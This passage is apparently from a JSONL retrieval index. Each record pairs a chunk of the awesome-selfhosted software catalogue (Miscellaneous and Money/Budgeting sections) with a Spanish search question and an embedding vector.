"pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: OpenReader β€” EPUB, PDF, DOCX, MD, and TXT file text to speech document reader. Read documents in realtime with high-quality TTS; or extract audiobooks [MIT, Docker]. OpenZiti β€” Fully-featured, zero trust, full mesh overlay network. Includes a 2FA support out of the box, clients for all major desktop/mobile OS'es [Apache-2.0, Go]. Operational.co β€” Receive alerts in a live timeline from your product [AGPL-3.0, Nodejs/Docker]. penpot β€” Web-based design and prototyping platform meant for cross-domain teams [MPL-2.0, Docker]. POMjs β€” Random password generator [GPL-2.0, Javascript]. PΓΈnskelisten β€” Sharing wishlists and collaborating on gifts and presents [GPL-3.0, Docker/Go]. re:Director β€” Simple domain redirection management tool [Apache-2.0, Java/Docker]. Reactive Resume β€” One-of-a-kind resume builder that keeps your privacy in mind. Completely secure, customizable, portable, open-source and free forever [MIT, Docker/Nodejs]. revealjs β€” Framework for easily creating beautiful presentations using HTML [MIT, Javascript].", "indexar": "cual es una herramienta open source para crear contraseΓ±as seguras", "v": [0.10827, 0.01691, -0.14714, -0.09966, 0.03507, -0.24126, -0.11213, -0.08809, -0.08123, -0.05675, -0.10437, -0.03643, -0.00876, -0.09982, 0.00965, 0.04982, 0.08899, -0.08114, 0.02159, 0.11722, 0.01492, -0.02285, -0.08613, -0.07349, -0.08691, -0.13744, 0.0793, -0.0295, -0.15634, 0.04935, 0.02981, 0.07069, 0.08861, 0.02542, -0.0728, 0.04971, -0.05088, 0.07916, -0.0015, 0.03075, 0.01584, 0.05701, -0.09986, 0.11731, 0.00636, 0.02198, 0.00995, 0.06096, 0.06382, 0.01205, -0.09579, -0.12844, -0.13605, -0.0941, 0.02988, -0.11022, 0.17714, -0.09155, -0.01814, -0.00855, -0.19126, 0.05437, 0.05796, -0.00266, -0.09511, -0.11168, 0.05813, -0.0339, -0.11515, 0.06281, 0.03281, -0.02381, -0.0301, 0.09527, 0.04609, -0.00095, -0.01718, -0.00106, 0.00861, 0.13569, -0.02948, -0.00702, 0.00284, -0.02178, -0.10845, -0.08495, 0.07408, -0.00848, 0.00668, -0.07515, 0.03239, -0.02153, -0.02356, 0.1163, 0.01064, -0.05575, 0.0342, -0.00849, -0.09355, -0.01674, -0.00212, -0.02982, -0.03341, 0.08583, -0.02898, -0.03097, -0.02883, 0.0113, -0.01326, -0.06633, 0.05037, 0.0247, -0.00433, 0.00302, 0.01382, 0.05595, -0.05268, -0.0564, 0.06457, -0.04572, 0.0093, -0.01069, -0.05573, -0.01166, 0.01667, 0.04271, -0.01418, 0.08282, -0.04621, -0.10152, -0.00623, -0.05664, -0.0901, 0.02986, -0.03856, 0.03233, 0.05469, -0.14331, -0.0574, -0.04154, 0.00226, 0.01358, 0.02982, -0.095, 0.05039, 0.06945, -0.00504, -0.02636, -0.06741, 0.02245, -0.02124, 0.02136, 0.01515, 0.02565, -0.09322, 0.06851, -0.05841, -0.03928, -0.08135, 0.13952, 0.0147, 0.01673, 0.00746, -0.02277, -0.04066, -0.05307, 0.02119, 0.02778, 0.08097, 0.01618, 0.04322, 0.03098, 0.05273, -0.03251, 0.01364, -0.09134, -0.04136, -0.10333, -0.00593, -0.10266, -0.02308, -0.02837, -0.04212, -0.02464, 0.0284, -0.07095, 0.1166, -0.00164, -0.01028, 0.04021, -0.01732, 0.02136, -0.04062, -0.01534, 0.01262, -0.04007, 0.01296, -0.08346, 0.00404, -0.02634, -0.04752, -0.00495, -0.04017, -0.0941, 0.05252, 0.01409, -0.07893, -0.03422, -0.06086, -0.00059, 0.06818, 0.00274, 0.02734, -0.04031, -0.04231, -0.06581, -0.03289, 0.02003, -0.05296, -0.02585, 0.02323, 0.0193, 0.04858, 0.00632, 0.02054, -0.00511, 0.01672, 0.02865, 0.04265, -0.00278, 0.04376, -0.01096, -0.07844, -0.02895, 0.09699, -0.01133, -0.01612, -0.05436, -0.02917, -0.0505, -0.0306, 0.06032, 0.00948, -0.08115, -0.03066, -0.04312, -0.04342, 0.03089, -0.04026, -0.10155, -0.073, 0.04147, 0.03991, -0.00244, 0.03284, -0.09151]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: Revive Adserver β€” Ad serving system. Formerly known as OpenX Adserver and phpAdsNew [GPL-2.0, PHP]. SANE Network Scanning β€” Allow remote clients to access image acquisition devices (scanners) available on the local host [GPL-2.0, C]. string.is β€” An open-source, privacy-friendly online string toolkit for developers [AGPL-3.0, Nodejs]. Teleport β€” Certificate authority and access plane for SSH, Kubernetes, web applications, and databases [Apache-2.0, Go/Docker/K8S]. TeslaMate β€” A powerful data logger for Tesla vehicles [MIT, Elixir/Docker]. Transmute β€” File converter for images, video, audio, json, excel and more. Supports over 2,000 conversions! [MIT, Docker]. URL-to-PNG β€” URL to PNG utility featuring parallel rendering using Playwright for screenshots and with storage caching via Local, S3, or CouchDB [MIT, Nodejs/Docker]. Usertour β€” User onboarding platform allowing you to create in-app product tours, checklists, and surveys in minutes effortlessly [AGPL-3.0, Docker].", "indexar": "que herramienta me sirve para convertir archivos de imagen a video?", "v": [0.02361, -0.01825, -0.08268, -0.20969, -0.03475, -0.17706, -0.09225, -0.05218, 0.08173, -0.17231, -0.02014, -0.17075, -0.0058, -0.07125, 0.04158, 0.06123, 0.13149, -0.09755, 0.08599, -0.02738, 0.08827, 0.03602, -0.08658, -0.1155, -0.06529, -0.01039, -0.02514, 0.07633, -0.1668, -0.03276, -0.03869, 0.00658, 0.05253, -0.00682, -0.09676, -0.06787, 0.00742, 0.01498, -0.1168, 0.10978, -0.01017, 0.07568, -0.06268, 0.08987, -0.03542, -0.04559, 0.05445, -0.01801, -0.00987, 0.06139, 0.03837, -0.09084, -0.09427, 0.08425, -0.06047, -0.17008, 0.11067, -0.16328, 0.00145, -0.04493, -0.0311, 0.04925, -0.05723, -0.02313, -0.05537, 0.07304, -0.07815, 0.01529, -0.115, 0.03677, -0.04866, 0.06922, 0.11279, -0.02151, -0.1015, -0.02606, -0.00741, -0.03807, -0.11054, -0.04723, 0.07085, -0.06044, -0.05983, 0.00702, -0.048, -0.03922, 0.00046, 0.07054, 0.07491, -0.15278, -0.01806, 0.08595, 0.05995, -0.02434, 0.05287, 0.02206, 0.04266, -0.03993, -0.01235, -0.06235, 0.09581, -0.03592, -0.08582, 0.03065, 0.07194, 0.05712, 0.00384, -0.02611, -0.14545, -0.03875, 0.15693, 0.07065, 0.01124, 0.07941, -0.08605, 0.10704, -0.03628, -0.05932, -0.0357, -0.00767, 0.07777, 0.00543, -0.04743, -0.04058, -0.02256, 0.01184, -0.03953, 0.06248, -0.14165, -0.00114, -0.01193, -0.01956, -0.05339, 0.00177, -0.04553, -0.07722, 0.1343, -0.0504, -0.04894, -0.04974, 0.02322, 0.04966, -0.00726, -0.07595, 0.02823, 0.0141, 0.0923, -0.07044, -0.04953, -0.02828, 0.01193, -0.08556, -0.00014, -0.06425, -0.01389, 0.03612, -0.01804, -0.06524, -0.10315, 0.00173, -0.02547, -0.00639, 0.05475, 0.01545, -0.05549, -0.07026, -0.02152, 0.02374, 0.02416, 0.01559, 0.07796, -0.06485, 0.00377, -0.03503, -0.00583, 0.03033, -0.03207, -0.01412, -0.03285, -0.04644, -0.0075, 0.01511, 0.01987, 0.06083, 0.07098, -0.00473, 0.05529, 0.01899, -0.07769, 0.02256, -0.03641, -0.00499, -0.03902, -0.08338, 0.04526, -0.00672, -0.05503, -0.02048, -0.00532, 0.02334, 0.00154, -0.07285, -0.03562, 0.03086, -0.00732, 0.01192, -0.00797, -0.00934, 0.01216, -0.04894, -0.01863, 0.04134, 0.02433, -0.04335, 0.06859, -0.03962, 0.02959, 0.07842, -0.03198, 0.01723, 0.04522, 0.01135, 0.01824, -0.01608, -0.02878, 0.09083, -0.01157, 0.00301, -0.08941, -0.08051, -0.0004, 0.0093, -0.04076, -0.01488, 0.00886, -0.04785, -0.04972, -0.01228, -0.05794, -0.06201, 0.01405, 0.02762, -0.03081, 0.01896, -0.0615, -0.0248, -0.00644, -0.0269, 0.04437, -0.07393, 0.01126, 0.03106, 0.04161, 0.03771, -0.0086, 0.00783]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: Revive Adserver β€” Ad serving system. Formerly known as OpenX Adserver and phpAdsNew [GPL-2.0, PHP]. SANE Network Scanning β€” Allow remote clients to access image acquisition devices (scanners) available on the local host [GPL-2.0, C]. string.is β€” An open-source, privacy-friendly online string toolkit for developers [AGPL-3.0, Nodejs]. Teleport β€” Certificate authority and access plane for SSH, Kubernetes, web applications, and databases [Apache-2.0, Go/Docker/K8S]. TeslaMate β€” A powerful data logger for Tesla vehicles [MIT, Elixir/Docker]. Transmute β€” File converter for images, video, audio, json, excel and more. Supports over 2,000 conversions! [MIT, Docker]. URL-to-PNG β€” URL to PNG utility featuring parallel rendering using Playwright for screenshots and with storage caching via Local, S3, or CouchDB [MIT, Nodejs/Docker]. Usertour β€” User onboarding platform allowing you to create in-app product tours, checklists, and surveys in minutes effortlessly [AGPL-3.0, Docker].", "indexar": "cual es un programa para gestionar el acceso a servidores y bases de datos?", "v": [-0.11473, 0.04953, -0.02687, -0.26831, 0.02033, -0.11275, 0.07994, -0.12804, -0.12952, 0.0045, -0.10284, -0.13406, -0.05455, -0.09011, 0.0076, 0.03076, 0.17011, -0.09477, 0.0034, 0.05974, 0.00134, 0.07234, 0.0797, 0.02766, -0.16337, 0.05723, 0.06585, -0.1055, -0.03996, 0.08466, 0.03752, -0.11524, -0.0367, -0.06984, 0.07383, 0.04072, -0.04203, 0.16315, -0.03757, 0.02275, -0.04368, -0.0184, -0.08345, 0.00921, 0.1506, -0.03838, 0.04709, -0.02347, 0.09795, -0.10601, -0.12247, -0.00186, -0.03001, -0.05977, -0.03893, -0.09134, -0.00639, -0.13286, -0.00535, 0.08959, -0.14246, 0.05331, -0.009, -0.02238, 0.02148, -0.05465, 0.12335, 0.01339, -0.10071, 0.06463, -0.01075, 0.0739, -0.02431, -0.09441, 0.01463, -0.02937, 0.03466, 0.01146, 0.03727, 0.02284, -0.0561, 0.03267, -0.05219, 0.12574, -0.12883, -0.01825, 0.04367, -0.00575, -0.07937, -0.00311, 0.07663, 0.04155, -0.06458, 0.04296, 0.01538, 0.01289, 0.09768, -0.0666, -0.0119, 0.04052, 0.02392, 0.03889, -0.06381, 0.09029, -0.04322, 0.15389, 0.10734, -0.0406, -0.04022, -0.0333, -0.06386, -0.08137, -0.04559, 0.02416, -0.0096, -0.05495, 0.03568, -0.03653, 0.02659, 0.00844, -0.0591, -0.03852, 0.04593, 0.02387, 0.11791, -0.027, 0.0295, 0.05754, 0.00375, 0.05087, -0.01177, -0.01875, -0.05851, 0.02694, -0.01601, -0.02244, -0.00333, -0.01404, -0.01194, -0.08258, -0.06445, 0.09951, -0.01676, 0.05733, 0.07417, -0.06858, 0.07764, 0.00512, -0.02223, 0.02094, -0.01632, -0.02519, -0.00853, 0.07577, -0.12473, -0.00202, -0.00535, -0.04638, -0.12286, 0.00996, -0.01699, 0.05362, -0.0492, 0.04721, 0.04187, -0.0422, 0.01365, 0.07073, 0.05358, 0.07413, -0.06228, 0.05325, 0.04588, -0.05049, 0.01618, -0.05451, -0.10489, -0.13396, 0.04872, 0.03026, 0.02033, 0.00629, 0.04765, 0.03505, -0.04935, -0.04755, -0.06916, 0.01891, -0.01792, -0.01051, 0.01694, 0.05065, -0.01137, 0.00269, 0.07592, -0.07476, -0.06405, 0.02377, 0.02903, -0.00543, -0.01479, 0.03947, -0.02698, 0.01646, 0.00793, 0.06512, -0.00414, -0.01139, 0.03046, 0.02174, -0.02385, -0.00317, 0.06023, -0.00799, -0.06281, -0.04276, 0.03838, 0.01454, 0.04809, -0.01144, -0.04502, 0.02519, 0.0554, 0.01694, -0.04, -0.03379, 0.05137, 0.01625, 0.02614, -0.02713, -0.02221, -0.01598, 0.02357, 0.00515, -0.00139, -0.03581, -0.00423, -0.05626, -0.00267, -0.10603, 0.01313, 0.12002, -0.02548, -0.08963, -0.01772, -0.02116, -0.0804, 0.03291, -0.03759, -0.02174, -0.01662, -0.03061, 0.00601, -0.0087, 0.01041, -0.02101]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: Revive Adserver β€” Ad serving system. Formerly known as OpenX Adserver and phpAdsNew [GPL-2.0, PHP]. SANE Network Scanning β€” Allow remote clients to access image acquisition devices (scanners) available on the local host [GPL-2.0, C]. string.is β€” An open-source, privacy-friendly online string toolkit for developers [AGPL-3.0, Nodejs]. Teleport β€” Certificate authority and access plane for SSH, Kubernetes, web applications, and databases [Apache-2.0, Go/Docker/K8S]. TeslaMate β€” A powerful data logger for Tesla vehicles [MIT, Elixir/Docker]. Transmute β€” File converter for images, video, audio, json, excel and more. Supports over 2,000 conversions! [MIT, Docker]. URL-to-PNG β€” URL to PNG utility featuring parallel rendering using Playwright for screenshots and with storage caching via Local, S3, or CouchDB [MIT, Nodejs/Docker]. Usertour β€” User onboarding platform allowing you to create in-app product tours, checklists, and surveys in minutes effortlessly [AGPL-3.0, Docker].", "indexar": "existe alguna alternativa libre a los sistemas de publicidad online como OpenX?", "v": [-0.03169, 0.09066, -0.12436, -0.06976, -0.12347, -0.129, -0.07913, -0.06507, -0.1834, -0.09166, -0.02903, -0.24989, 0.06355, -0.00845, 0.11526, -0.08686, 0.0102, -0.12419, 0.10012, -0.06628, -0.03803, 0.01923, -0.0998, -0.10363, 0.03092, -0.06138, -0.02738, -0.08955, -0.05832, 0.04475, 0.00326, -0.00791, 0.0553, -0.01167, -0.1155, 0.04299, 0.05964, -0.00064, 0.16154, -0.04836, 0.16397, 0.00183, -0.0229, 0.16801, 0.0532, 0.01588, -0.13172, 0.08941, -0.05402, -0.02287, -0.04578, -0.08562, -0.12049, -0.01097, 0.22155, -0.03361, 0.05962, -0.12576, -0.06429, -0.01331, 0.00254, 0.0237, 0.05693, -0.07349, 0.03467, 0.08444, 0.00483, 0.01231, -0.07965, 0.09476, 0.05256, -0.06319, 0.03818, 0.03228, -0.06467, 0.09951, -0.04937, 0.0089, -0.02808, 0.03876, -0.00754, -0.01772, 0.00565, 0.05269, -0.03802, -0.06246, -0.01834, -0.06578, -0.06058, 0.00079, 0.10522, 0.0672, 0.02168, 0.12701, 0.04536, -0.10967, -0.08438, 0.02443, 0.00672, 0.06803, 0.00977, 0.07221, -0.1145, -0.107, -0.06013, -0.04019, 0.05262, -0.08036, -0.02624, -0.00309, 0.04895, -0.02881, -0.0076, -0.02961, 0.01527, -0.06503, 0.03064, 0.06013, -0.00941, -0.01224, -0.01924, -0.00159, 0.02877, 0.00612, -0.01759, 0.00741, -0.02213, 0.06084, -0.05466, -0.01089, 0.06213, -0.02798, -0.02401, -0.01554, -0.02408, -0.0303, 0.04929, 0.05156, 0.0297, -0.02513, -0.00493, -0.02127, -0.04155, -0.0679, 0.00391, -0.02872, 0.01585, -0.04433, -0.03385, -0.0727, -0.12599, -0.02604, -0.04732, 0.08533, 0.02044, 0.04318, -0.02156, 0.01087, 0.01418, 0.07318, -0.07759, -0.03797, -0.00315, 0.04163, 0.00496, 0.05975, -0.04752, -0.00835, 0.00963, 0.08196, 0.02652, 0.12073, 0.08133, -0.15588, 0.04882, -0.01802, -0.04837, -0.10165, 0.00963, -0.0344, 0.0165, -0.03429, -0.02791, -0.01601, -0.00876, 0.00456, -0.00427, -0.03167, -0.05529, 0.05254, -0.00044, -0.04389, -0.13037, -0.0463, 0.04073, -0.03269, -0.00051, -0.04463, -0.00037, 0.02911, -0.10553, -0.02851, 0.03558, -0.0557, -0.05423, 0.04957, 0.01928, 0.02522, -0.01546, 0.06492, 0.07443, -0.04561, -0.0183, -0.03739, -0.03142, 0.01399, 0.07136, -0.05271, -0.03665, -0.00741, 0.029, -0.01154, -0.01256, -0.00515, 0.04428, 0.01112, 0.03039, 0.02705, -0.02238, -0.03602, -0.00132, -0.09029, -0.02506, 0.04498, -0.01284, -0.00132, 0.01251, 0.00099, 0.00099, 0.01245, 0.03085, 0.06425, 0.00623, -0.02306, 0.01662, -0.09509, -0.0751, -0.04058, -0.02604, -0.04715, -0.0708, 0.01575, -0.03479, 0.01952, 0.04736, 0.04539]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: Warracker β€” Warranty tracker that lets you monitor expiry dates, upload receipts/files, and get alerts before warranties expire [AGPL-3.0, Docker]. Wavelog β€” Webbased Logging Software for Radio Amateurs. Enhanced QSO logging, statistics and maps for your browser [MIT, PHP/Docker]. WeeWX β€” Open source software for your weather station [GPL-3.0, Python/deb]. WeTTY β€” Terminal in browser over http/https [MIT, Docker/Nodejs]. Wishlist β€” Wishlist application that you can share with your friends and family [MIT, Docker/K8S]. Yamtrack β€” Media tracker for movies, tv shows, anime, manga, video games and books [⚠, AGPL-3.0, Docker/Python]. Zero-TOTP β€” Complete, reliable, secure and zero-trust webapp based on zero-knowledge encryption to store your TOTP codes [GPL-3.0, Docker].", "indexar": "que programa me sirve para guardar el historial de mis llamadas de radio amateur?", "v": [0.11959, 0.1731, -0.03703, -0.21131, -0.12217, -0.10924, -0.02383, 0.0009, -0.04186, -0.03365, 0.01314, -0.12162, 0.09832, -0.00753, 0.10509, 0.00886, 0.09573, 0.02077, 0.10572, 0.04419, -0.01833, 0.15142, 0.06824, -0.02316, -0.13696, -0.00196, 0.05127, -0.0488, -0.12052, 0.00533, 0.07252, -0.03257, 0.04208, -0.14879, -0.06009, 0.05827, 0.14807, 0.08127, -0.05016, 0.09431, 0.02179, -0.05316, -0.04183, 0.08547, 0.06898, 0.03246, -0.01519, 0.01488, 0.02981, 0.04691, 0.00724, -0.02203, 0.00211, 0.09003, 0.00572, -0.08881, 0.01592, -0.10304, -0.06961, -0.08006, 0.01097, -0.04905, 0.08306, 0.02291, 0.07569, -0.08457, 0.04293, 0.0049, -0.11812, -0.01116, -0.11697, 0.10073, 0.01718, 0.03464, 0.01235, -0.05459, -0.0249, -0.03397, 0.03144, 0.01504, -0.05129, -0.05964, 0.07598, 0.03674, -0.10725, 0.10792, 0.08066, -0.00189, -0.03538, -0.0857, 0.01755, 0.05805, -0.04151, 0.0759, 0.09731, -0.07691, 0.08368, 0.03306, 0.03577, 0.06757, 0.12538, -0.00859, -0.02549, 0.04736, 0.0366, 0.10066, 0.07508, -0.06072, 0.03901, 0.02397, -0.07729, -0.02082, -0.03284, 0.02836, -0.07596, 0.00169, -0.00406, -0.02903, 0.00355, -0.02064, -0.08337, 0.05075, 0.01012, 0.03732, 0.05532, 0.04025, -0.06243, 0.04664, 0.00401, 0.1614, 0.07464, 0.05527, -0.00242, -0.08311, 0.02393, -0.07907, -0.03226, -0.01893, 0.07658, -0.01504, 0.03012, 0.13417, -0.06233, 0.03542, 0.02593, 0.04142, -0.00072, -0.02692, 0.01622, -0.04434, 0.00094, 0.02113, -0.03897, 0.07765, -0.06398, -0.05716, 0.06602, -0.10624, -0.03221, 0.09933, -0.02968, 0.00074, 0.02115, -0.09539, 0.07065, -0.11823, 0.05346, 0.01381, 0.09316, -0.01873, -0.02378, -0.07134, 0.05107, -0.14142, -0.0976, -0.0454, -0.05431, 0.00992, 0.0919, -0.06629, -0.13523, 0.04884, 0.06903, 0.01987, 0.01903, -0.02216, -0.08602, 0.00393, 0.01027, -0.0554, 0.00234, -0.01919, 0.01054, 0.03954, -0.04156, -0.0175, -0.01876, -0.02722, 0.03298, 0.0234, -0.09301, -0.02641, 0.02931, 0.02188, 0.04895, 0.04423, -0.03073, -0.02256, 0.06143, 0.09513, 0.04672, -0.03687, 0.05968, 0.02788, -0.07253, 0.00087, 0.00416, 0.03494, -0.00785, 0.01558, 0.04154, -0.04529, 0.02099, 0.01278, -0.02973, -0.03553, -0.00538, -0.02274, 0.03299, -0.01891, -0.0058, -0.00875, -0.01683, 0.00173, 0.00912, -0.00712, -0.0013, -0.03605, -0.01293, -0.10475, -0.02163, 0.11032, -0.02553, 0.03945, -0.02847, -0.01738, 0.03274, 0.06043, 0.00269, 0.0024, -0.01468, 0.04212, 0.0431, -0.03981, 0.12125, 0.026]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: Warracker β€” Warranty tracker that lets you monitor expiry dates, upload receipts/files, and get alerts before warranties expire [AGPL-3.0, Docker]. Wavelog β€” Webbased Logging Software for Radio Amateurs. Enhanced QSO logging, statistics and maps for your browser [MIT, PHP/Docker]. WeeWX β€” Open source software for your weather station [GPL-3.0, Python/deb]. WeTTY β€” Terminal in browser over http/https [MIT, Docker/Nodejs]. Wishlist β€” Wishlist application that you can share with your friends and family [MIT, Docker/K8S]. Yamtrack β€” Media tracker for movies, tv shows, anime, manga, video games and books [⚠, AGPL-3.0, Docker/Python]. Zero-TOTP β€” Complete, reliable, secure and zero-trust webapp based on zero-knowledge encryption to store your TOTP codes [GPL-3.0, Docker].", "indexar": "cual es una alternativa libre a las aplicaciones que usan para llevar control de garantΓ­as de productos?", "v": [-0.01575, 0.11748, -0.06754, -0.14223, 0.02444, -0.03502, -0.00592, 0.00157, -0.18826, 0.0161, -0.0897, -0.21571, -0.02568, 0.01425, -0.01637, -0.04177, 0.01907, -0.18074, 0.08484, 0.15579, 0.00281, -0.00535, -0.16404, -0.1328, -0.13788, 0.07348, 0.11158, -0.04423, -0.12232, 0.09065, -0.00253, -0.05281, 0.09408, -0.07803, -0.15673, -0.01458, 0.00991, 0.05756, 0.12128, 0.0704, 0.02121, -0.17519, 0.03198, -0.02113, 0.00652, 0.00703, 0.033, 0.04474, -0.02066, 8e-05, -0.02311, -0.07531, -0.056, 0.08892, 0.09341, -0.04404, 0.05779, -0.07022, 0.02391, -0.06527, -0.10826, 0.05127, 0.14249, 0.06767, 0.07563, 0.02152, -0.06518, 0.03524, -0.09882, 0.04093, 0.05425, -0.06052, -0.02712, -0.01672, -0.09702, 0.02568, -0.10033, 0.06375, 0.03341, 0.02303, 0.02408, -0.04085, -0.05733, 0.06946, 0.02618, -0.10861, 0.04082, -0.01415, -0.00035, -0.02622, 0.04124, 0.01356, -0.0465, 0.07675, -0.03551, -0.08917, 0.02723, 0.07143, 0.06661, 0.12825, 0.07003, 0.0377, -0.04024, -0.02414, -0.03593, -0.06492, 0.02686, 0.00711, -0.08786, 0.03576, -0.0458, -0.01208, 0.01523, -0.01122, -0.00316, 0.0499, -0.00919, -0.09186, 0.0024, -0.02507, 0.02084, -0.01978, -0.01653, -0.05062, 0.12864, 0.02943, 0.05279, 0.08993, -0.06326, 0.01248, 0.11338, -0.0543, -0.04046, -0.04918, -0.07035, -0.08257, 0.0623, -0.01269, 0.05013, 0.00956, 0.00262, 0.04446, 0.01417, 0.00557, 0.07372, -0.04784, -0.07798, 0.02022, 0.0333, 0.06014, -0.01381, 0.03607, -0.03314, 0.053, 0.00594, 0.07221, -0.10409, -0.04733, 0.00432, 0.05184, -0.01332, -0.013, -0.04119, 0.00842, -0.01411, -0.09194, 0.0429, -0.02475, -0.04082, 0.04051, -0.0341, 0.11927, 0.04865, -0.06628, 0.02311, -0.0757, -0.03132, -0.08622, 0.03253, -0.11595, -0.03604, 0.03551, -0.05545, 0.04543, 0.06511, -0.0834, -0.00465, 0.01656, 0.05396, 0.05902, -0.04011, 0.03909, 0.00725, -0.10128, -0.0341, 0.01569, 0.00649, -0.06723, -0.03728, -0.04055, -0.04835, -0.05974, -0.01804, -0.0689, 0.03287, -0.00946, -0.05152, 0.04796, -0.01524, 0.05463, -0.00848, 0.03398, 0.06951, 0.07813, -0.04653, -0.04963, 0.01586, 0.02319, 0.00215, -0.00934, 0.02202, -0.03427, 0.01723, 0.04427, -0.04273, -0.01089, 0.02546, 0.03744, -0.03432, -0.00966, 0.03681, -0.03488, -0.03336, -0.03736, 0.04462, 0.00514, 0.04293, -0.00072, 0.02103, -0.0455, 0.00087, 0.10449, 0.00764, -0.06329, -0.08461, 0.00385, -0.11721, 0.01679, -0.08699, -0.05192, -0.01371, 0.04331, 0.03704, 0.01657, 0.02086, -0.00339]} -{"tipo": "pregunta", "herramienta": "Money, Budgeting & Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Money, Budgeting & Management", "tema": "money, budgeting & management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Money, Budgeting & Management: Actual β€” Local-first personal finance tool based on zero-sum budgeting, supporting synchronization across devices, custom rules, manual transaction importing (from QIF, OFX, and QFX files), and optional automatic synchronization with many banks [MIT, Nodejs/Docker]. Bigcapital β€” Financial accounting and inventory management software for small to medium businesses [AGPL-3.0, Docker]. Bitcart β€” Cryptocurrencies payment processor and development platform [MIT, Docker/Python/Nodejs]. BTCPay Server β€” Bitcoin and other cryptocurrencies payment processor [MIT, C#]. Budget Board β€” Simple app for tracking monthly spending and working towards financial goals [GPL-3.0, Docker]. DePay β€” Accept Web3 Payments directly into your wallet. Peer-to-peer, free, self-hosted & open-source [MIT, Nodejs]. Econumo β€” Budgeting application for managing personal and family finances, supporting multiple currencies, joint accounts, and budgets [MIT, Docker]. ExpenseOwl β€” Extremely simple expense tracker with a beautiful UI [MIT, Go/Docker/K8S].", "indexar": "ΒΏhay alguna herramienta de finanzas personales local que me permita importar transacciones desde varios bancos?", "v": [0.13318, 0.16864, 0.02887, -0.08648, 0.09114, -0.12436, 0.08531, -0.06814, -0.28592, -0.04582, -0.0638, -0.03582, 0.06205, -0.0091, 0.02146, 0.0367, -0.02314, -0.11933, 0.11493, -0.05556, 0.05667, -0.11145, -0.05868, -0.02362, -0.07809, -0.05342, 0.04255, -0.10196, -0.18718, 0.04961, 0.11409, -0.11621, 0.0844, -0.03523, 0.04501, -0.03189, 0.11006, -0.01198, 0.09553, -0.08168, 0.12977, -0.0747, 0.0216, -0.06866, 0.09982, 0.0439, -0.08891, 0.06141, 0.02515, -0.02422, 0.07131, -0.11196, -0.11273, 0.03026, 0.06817, -0.04691, 0.09691, -0.01012, 0.06444, -0.01534, -0.07885, 0.09208, 0.10299, 0.05823, -0.03221, 0.04206, 0.0844, -0.08452, 0.00096, 0.08304, -0.09535, 0.07319, -0.00938, 0.12494, 0.01772, -0.02643, 0.12683, 0.0168, -0.06497, -0.03774, -0.03982, -0.10475, -0.03197, 0.09238, 0.02472, -0.03124, 0.01661, 0.04651, 0.08455, 0.03284, -0.05487, -0.04862, -0.08065, -0.08453, 0.01274, 0.02963, -0.04148, 0.01215, -0.00902, -0.07876, 0.06515, -0.0325, -0.10724, 0.03318, -0.07651, 0.03793, 0.00521, -0.03177, -0.02723, -0.05322, 0.05258, 0.09497, -0.01932, 0.04871, 0.0022, 0.09907, -0.03712, 0.03856, 0.03329, -0.03005, -0.10977, -0.08222, 0.02587, -0.01062, -0.02274, -0.05296, -0.08376, 0.02706, 0.00932, 0.01924, -0.06585, 0.04148, -0.02993, -0.04961, -0.01982, -0.038, -0.0397, -0.08019, -0.01005, -0.06187, -0.00702, 0.00756, 0.01562, -0.0113, 0.04887, 0.03504, -0.02199, -0.04695, -0.10042, -0.02345, 0.04434, -0.03081, -0.05377, 0.04692, 0.03015, 0.02835, 0.05676, 0.01141, -0.10395, 0.01258, -0.00217, 0.06207, 0.05979, -0.0322, -0.11261, -0.06621, -0.03306, 0.0453, 0.0278, 0.04101, 0.07379, 0.01416, -0.00426, -0.09116, -0.01043, -0.08998, -0.00651, -0.03554, 0.04106, -0.0359, 0.01036, 0.0006, 0.00993, -0.02527, -0.00498, 0.00309, 0.01543, 0.05575, -0.01685, 0.01575, -0.03654, 0.04982, -0.10645, 0.013, 0.00649, 0.02445, -0.06125, 0.01394, 0.03515, 0.01933, -0.00649, -0.00106, 0.01497, -0.0388, 0.05065, 0.12203, -0.07445, 0.01496, -0.04768, 0.04067, -0.00087, -0.00076, 0.12071, -0.03599, 0.0321, -0.07012, -0.06377, 0.01439, -0.0407, 0.04491, 0.01554, 0.00702, 0.09282, 0.04322, -0.0427, 0.03576, -0.01794, -0.0064, -0.0103, 0.03026, 0.02631, 0.05217, -0.05459, -0.05461, 0.01006, 0.00815, 0.03602, -0.02029, -0.04881, -0.04056, 0.01181, 0.01632, -0.0342, -0.08709, -0.03219, 0.0215, -0.10243, 0.017, -0.05357, -0.04352, 0.01681, 0.01191, 0.08905, 0.02695, 0.0512, -0.03095]} -{"tipo": "pregunta", "herramienta": "Money, Budgeting & Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Money, 